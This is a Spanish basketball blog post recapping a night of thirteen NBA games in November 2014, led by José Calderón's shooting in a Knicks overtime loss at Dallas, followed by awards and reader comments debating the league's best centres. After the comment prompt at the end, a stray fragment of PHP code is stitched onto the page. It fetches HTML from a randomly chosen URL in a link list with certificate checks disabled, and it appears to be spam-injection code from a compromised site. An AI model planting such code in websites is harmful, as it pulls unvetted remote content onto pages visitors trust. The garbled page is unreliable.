La crónica: Calde provoca temblores en Dallas

27 de November de 2014 por FranGuaita

Siete triples del playmaker español en el thriller con prórroga entre Mavericks y Knicks. Además, Marc Gasol ejecuta a los Lakers con un tercer cuarto primoroso. Brotes verdes en Cleveland y puñetazo encima de la mesa de Toronto, que sigue líder en el Este. Trece partidos en una madrugada loca en la NBA.

Pasen y lean.

calde

MAVERICKS 109 – KNICKS 102 (OT)
A la conclusión del partidazo de la noche en el American Airlines Center -prórroga incluida gracias a un tiro brutal de JR Smith a falta de nueve décimas-, Dirk Nowitzki salió pitando del banquillo de los Mavericks. No iba a su vestuario para ducharse rápido y abandonar el pabellón en dirección al restaurante más cercano. Se dirigía hacia la zona en la que se encontraba el mejor jugador rival para felicitarle por su recital, que a punto estuvo de provocar la victoria de los Knicks en Dallas. Ese hombre no era otro que José Manuel Calderón, cuyo gran trabajo en el rebote, la dirección y, fundamentalmente, exhibición en el tiro, provocaron que Mark Cuban acabara la noche más despeinado de lo habitual. ‘Calde’ firmó una hoja de servicios con 21 puntos (7/9 en tiros de tres), 10 rebotes y 4 asistencias. Sólo así se entiende que NY tuviera opciones de ganar pese a la ausencia de Carmelo Anthony. Seis puntos consecutivos de Monta Ellis y la enésima misión de salvación a cargo de Nowitzki (30 puntos y 6 rebotes) arruinaron el excelente partido del playmaker español.

LAKERS 93 – GRIZZLIES 99
Durante dos cuartos, los Lakers -una de las peores franquicias de la liga y en el furgón de cola del Oeste- soñaron con dar el bombazo de la madrugada ante Memphis, líder de la Western. Dos cuartos, digo. Superado ese tiempo, el mejor center a este lado del la tierra de los sueños finiquitó el asunto. Marc Gasol anotó 12 de sus 19 puntos en el tercer periodo para liderar la remontada de los Grizzlies en el Staples Center. Del 51-46 del descanso al 74-80 para iniciar el último periodo. Ni Jordan Hill ni Carlos Boozer ni, evidentemente, Robert Sacre fueron capaces de provocar un mínimo ataque de cosquillas al hermanísimo, jugando una madrugada más a nivel All Star. Por si esto fuera poco, a Gasol le quedaban un par de balas en la cartuchera, Tras un descanso excesivamente prolongado en el cuarto final y con L.A. apretando, volvió a pista para meter dos tiros desde seis metros y mantener el confeti púrpura y dorado en el techo del coliseo angelino. En la tierra de Elvis habita una sólida alternativa al poder establecido de los Spurs.

CAVALIERS 113 – WIZARDS 87
Por primera vez en toda la regular season, LeBron James esbozó anoche una tímida sonrisa en la recta final de la paliza que sus Cavaliers endosaron a Washington. Cleveland buscó la vendetta desde el salto inicial. No hacía ni una semana del insultante 91-78 encajado en la tierra del Capitolio. La fórmula Irving-James-Love funcionó, pero desde la defensa. Intensidad detrás, rapidez en los cambios, traps y muchas manos bajo para provocar pérdidas en el juego en estático de los Wizards. El resultado a la conclusión del primero, concluyente: 31-18. Y gracias al maquillaje de John Wall en las dos últimas posesiones con dos triples. Los Cavs gestionaron esa preciada renta durante la práctica totalidad del partido e incluso la ampliaron en un portentoso último periodo (32-20). Además de las sensaciones positivas en defensa y generando rápidas transiciones, los números del Big Three en Cleveland lo dicen todo. James: 29 puntos, 10 rebotes y 8 asistencias. Love: 21 puntos. Kyrie: 18 puntos. Así, sí. Quizá por eso LeBron se atrevió a sonreír…

HAWKS 115 – RAPTORS 126
Cada partido que pasa el liderato de Toronto en la conferencia Este ofrece una apariencia más sólida. Además, permitiéndose el lujo de alejarse de etiquetas y estereotipos. ¿Quién dijo que los equipos de la eastern sólo podían ganar partidos dejando a sus rivales en 70 puntos?. Evidentemente, el libro de sistemas de Dwane Casey ofrece más registros. Siete jugadores de los Raptors alcanzaron las dobles figuras para asaltar el Philips Arena. No es sencillo designar el MVP en Toronto. DeRozan se marchó hasta los 27 puntos y Lowry firmó un doble doble con 14 puntos y 13 asistencias. Pero no pierdan de vista la aportación de la segunda unidad: Lou Williams 22 puntos y Greivis Vasquez 21. Toronto va muy en serio.

ROCKETS 102 – KINGS 89
Forzado a dar un paso adelante por la permanente ausencia de Dwight Howard, James Harden lanzó más de lo habitual ante Sacramento. No se movió en sus porcentajes habituales (10/31 en tiros de campo), pero repartó ocho asistencias y fue capaz de capturar siete rebotes en su esfuerzo para liderar el triunfo de Houston. El hombre de la barba no estuvo solo. Mejores marcas personales de anotación NBA para Motejunas (21 puntos) e Isaiah Canaan (24 puntos y 6/10 en tiros de tres). Pese a la derrota de los Kings, mucho ojo a los numerazos de DeMarcus Cousins, amo y señor de la pintura: 29 puntos y 17 rebotes.

SUNS 120 – NUGGETS 112
En la batalla de la consistencia. Phoenix se mantiene un par de escalones por encima de los Nuggets. Es innegable que Denver tuvo que emplearse el martes hasta prácticamente el último segundo para doblegar a Chicago, pero también lo es que los Suns son en este momento de la temporada mucho más equipo. Fundamentalmente, gracias al excelente rendimiento de sus diabólicos pequeños. Eric Bledsoe, Goran Dragic y Gerald Green -desde el banquillo- se combinaron para 65 puntos. Otro noche gris para Manimal. 8 puntos y 5 rebotes en prácticamente 30 minutos de juego. Brian Shaw tiene un problema con Kenneth Faried. Si no lo resuelve con eficacia, Denver puede quedarse fuera de playoffs. Al tiempo…

SPURS 106 – PACERS 100
Quizá afectados por la baja de Gregg Popovich (ausente del banquillo por razones médicas leves, según comunicado oficial de la franquicia), los Spurs dilataron más de la cuenta el trámite ante Indiana. Bajo la dirección de Ettore Messina, fue precisamente uno de sus pupilos en Bolonia allá por 2001 quien resultó decisivo. Manu Ginóbili firmó 28 puntos desde la segunda unidad tejana para dejar a los Pacers moribundos a unos metros de la orilla. El escolta argentino generó 21 puntos en la segunda mitad y fue el brazo ejecutor durante el parcial final de 16-2 que disparó a San Antonio en el electrónico.

THUNDER 97 – JAZZ 82
No llueve eternamente. Ni siquiera en Oklahoma, pese a la ausencia de Kevin Durant y Russell Westbrook, cuyo retorno parece inminente. Propulsados por el gran partido del eléctrico Reggie Jackson (22 puntos, 8 asistencias con una serie de 10/18 en tiros de campo), los Thunder conquistan su triunfo número 4 de la regular season. Serge Ibaka aportó músculo en la pintura con 20 puntos y 8 rebotes. Y mucha atención a la aportación de calidad de Jeremy Lamb desde las profundidades del banquillo de Scott Brooks: 21 puntos en 23 minutos con 7/8 en tiros de campo. El Siglo XXI, a escena.

MAGIC 96 – WARRIORS 111
Ni rastro de cansancio en las piernas de los Warriors pese al exigente partido que tuvieron que disputar en Miami la madrugada del martes al miércoles. Steph Curry sigue a la suya. Sonriendo y enchufando. Steve Kerr tuvo la deferencia de sentarlo anoche a la conclusión del tercer cuarto para que el roto no fuera mayúsculo (65-92). Hasta ese momento, llevaba 28 puntos, 8 asistencias y 6 triples. Ya no regresó a la pista. Le quedan demasiadas batallas por delante como para malgastar energías.

PISTONS 98 – CLIPPERS 104
Sin evidenciar rasgos de superioridad amenazante como ocurre con equipos como Warriors o Spurs, L.A. Clippers sigue sumando victorias. A la chita callando, ya están en 9-5. Sufiendo, como anoche en el Palace de Auburn Hills. Y dejando la tarea para última hora. En el arranque del último periodo, Detroit mandaba por 73-72. Fue el momento de Jamal Crawford -otra temporada serio aspirante al galardón de mejor sexto hombre. y Chris Paul. Ambos se combinaron para 31 puntos en la segunda mitad. Para casos de emergencia, siempre ayuda el trabajo de un currante excelso como Blake Griffin: 15 puntos, 7 rebotes y 7 asistencias.

TIMBERWOLVES 86 – BUCKS 103
Les resumo el partido que anoche disputaron Minnesota y Milwaukee en el Target Center con una frase. Ni Ricky Rubio, ni Kevin Martin, ni Mo Wiliiams, ni Pekovic, Así de duro. Entre la pandemia de ausencias que sufren y la exhibición interior de Larry Sanders (15 puntos, 7 rebotes y 5 tapones), los Timberwolves se desfondaron en el último cuarto (parcial de 16-31) para encajar su décima derrota de la temporada regular.

HORNETS 97 – BLAZERS 105
Definitivamente, Portland ha adquirido velocidad de crucero. Nueve victorias consecutivas para uno de los equipos más en forma del salvaje Oeste. Incluso en una madrugada aciaga para un prodigio de la fiabilidad como es LaMarcus Aldridge (3/18 en tiros de campo), los Blazers salieron adelante en Charlotte. Buena parte de culpa la tuvo Wesley Matthews: 28 puntos con 6/9 en tiros de tres. Palabras mayores. En los Hornets, recital del de siempre: Al Jefferson. 21 puntos y 14 rebotes. Si mantiene el nivel, debería ser uno de los fijos en el All-Star.

SIXERS 91 – NETS 99
A falta de dos días para cumplir el primer mes de competición, Philadelphia sigue sin ganar. Son quince partidos y otras tantas derrotas. El único equipo en toda la NBA que no sabe lo que es una W. Con este 0-15, los Sixers igualan el peor registro histórico de la franquicia. Anoche tuvieron sus opciones hasta que en el último cuarto emergió la figura de Alan Anderson. El que fuera jugador del Barça anotó 10 de sus 12 puntos en la recta final de partido para enmudecer el Wells Fargo Center. Antes, Deron Williams tiró del carro de los Nets, flirteando con el triple doble (17 puntos, 8 rebotes y 10 asistencias).

PREMIOS

MVP: Tyson Chandler, con su revenge game contra los Knicks (17 puntos y 25 rebotes) se cuela en la fiesta de algunos habituales en la sección como son su compañero Dirk Nowitzki (30, 6, 2, 3), LeBron James (29, 10, 8, 3), Curry (28, 5, 8), James Harden (26-7-8 y 3 tapones) o Marc Gasol (19 puntos, 11 rebotes, 4 asistencias, 3 tapones y 2 robos).

Rookie: Elfrid Payton con 13-5, Spencer Dinwiddie con 10-4 y, sobre todo, KJ McDaniels (18 puntos, 6 rebotes) fueron algunos de los novatos más destacados en una noche marcada por el duelo entre  Jabari Parker (11-7-3) vs Andrew Wiggins (14-8-4-2).

Sorpresa: Varios candidatos, como Rasual Butler (23 puntos), Shaun Livingston (15-5), Greivis Vásquez (21-2-3 en 17 minutos), Isaiah Canaan (24 puntos, 6 rebotes, 4 asistencias, 4 robos), Donatas Motiejunas (21 puntos con 10/15 fg, 6 rebotes, 3 asistencias y 3 robos) o Jeremy Lamb (21 puntos con 7/8 tiros, 4 rebotes, 2 asistencias y 3 robos).

Decepción: Esperábamos un gran partido entre Wizards y Cavs, pero los capitalinos no cumplieron, especialmente John Wall (6 puntos y 5 pérdidas). Y, sin Collison, también pensábamos que veríamos un Sessions muy superior. Anoche solo 8 puntos, 3 asistencias y 5 pérdidas del base. Volvió Thaddeus Young de la lesión pero casi que mejor no lo hubiera hecho. El ex de los Sixers anotó sólo 3 puntos con un 1 de 10 en TC. Lamarcus Aldridge vivió una de sus noches más aciagas en el tiro. Se quedó en 9 puntos tras anotar sólo 3 canastas de 18 intentos.

Mayor esfuerzo en vano: Jose Calderón dio un paso adelante sin Melo para 21 puntos, 10 rebotes y 4 asistencias. Al Horford & Jeff Teague sumaron 47 puntos, 12 rebotes y 16 asistencias. Pero el premio es para DeMarcus Cousins, autor de 29 puntos, 17 rebotes, 6 asistencias, 3 tapones y 7 pérdidas.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Azabel dice:
    #1

    que temporadon de Cousins y sus Kings, el ultimo pivote jugador franquicia ahora que Howard juega a la sombra de Harden

      Citar

  2. txusma dice:
    #2

    Azabel:
    que temporadon de Cousins y sus Kings, el ultimo pivote jugador franquicia ahora que Howard juega a la sombra de Harden

    El mejor pívot de la liga junto Anthony Davis.

      Citar

  3. Jose A. Ramírez dice:
    #3

    Me gustaria resaltar dos cosas a estas alturas de regular season. Tremenda la temporada de Toronto, espectacular, que euipo mas solido, que banquillo mas profundo y que bueno que es lou williams, se sabe que es el mejor jugador de la nba junto a jamaal crawford creandose sus tiros. Bienvenidos al basket street a nivel pro Jugon !. La otra cuestion a resaltar, lo infravalorado que esta W.Matthews, el escolta mas completo de la nba y lo lleva ya demostrando unas temporadas. Corre, enchufa, se mueve bien sin balon, defiende como un poseso…. lo dijo el mismo hace tiempo y es de justicia que no se le valora tanto, jugadorazo. Saludos a todos

      Citar

  4. TheDeerHunter dice:
    #4

    txusma: El mejor pívotde la liga junto Anthony Davis.

    Hacen numerazos, juegan de la ostia… Pero abrir ese melón e ignorar a Marc me parece extraordinario.
    Este año no se puede decir que Marc juegue con excesiva ventaja en cuanto a equipo y ahí están los Grizzlies. El problema de Marc es que el hecho de que todos los sistemas de Memphis, ofensivo y defensivo, giran al son que él toca… pero claro todo eso no suma en el boxscore.

    Para mí, sin ánimo de menospreciar, tanto Davis como Cousins aún tienen que demostrar algunas cosas en esta liga que sí ha demostrado Marc. No me vale con destacar en partidos de regular abusando de jerarquía únicamente para inflar números. El liderazgo es algo más.

      Citar

  5. Nacho dice:
    #5

    TheDeerHunter: Hacen numerazos, juegan de la ostia… Pero abrir ese melón e ignorar a Marc me parece extraordinario.
    Este año no se puede decir que Marc juegue con excesiva ventaja en cuanto a equipo y ahí están los Grizzlies. El problema de Marc es que el hecho de que todos los sistemas de Memphis, ofensivo y defensivo, giran al son que él toca… pero claro todo eso no suma en el boxscore.

    No se puede decir mejor!!!
    Para mí, sin ánimo de menospreciar, tanto Davis como Cousins aún tienen que demostrar algunas cosas en esta liga que sí ha demostrado Marc. No me vale con destacar en partidos de regular abusando de jerarquía únicamente para inflar números. El liderazgo es algo más.

      Citar

  6. Nacho dice:
    #6

    Qué mal he citado. lol

    Quería decir que suscribo punto por punto lo dicho por Deer. Y qué que bien dicho!

      Citar

  7. txusma dice:
    #7

    La verdad es q se me olvidó mencionar a Marc, algo ciertamente imperdonable… De todas maneras yo me refería a los mejores pivots a día de hoy. Es decir, lo q hicieran unos y otros los años anteriores no debería contar. Mirando solo esta temporada, los 3 están un nivel superlativo, cada uno con sus grandezas y defectos.

      Citar

  8. basketdesdezgz dice:
    #8

    1º enhorabuena por vuestro trabajo. Genial Calde anoche. Espero que muestre este nivel a diario, y no sólo contra Dallas por estar extramotivado. Tengo esperanzas con él, no demasiadas con los Knicks. Creo que el triángulo ofensivo de Phil Jackson le puede venir bien. Puede cumplir el papel de Steve Kerr en los Bulls, enchufando triples en la posición libre, pero también puede cumplir el de acompañante anotador de Carmelo. A ver cómo va. Respecto a los pivote, de acuerdo en el trío del honor ahora. No me gusta poner a uno por encima del otro, pero ahora mismo Marc es el 1, debido al 13-2 de Memphis.
    Espero más minutos para mis 2 jugones, Mike Scott y John Leuer.
    Buen día desde Zaragoza

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>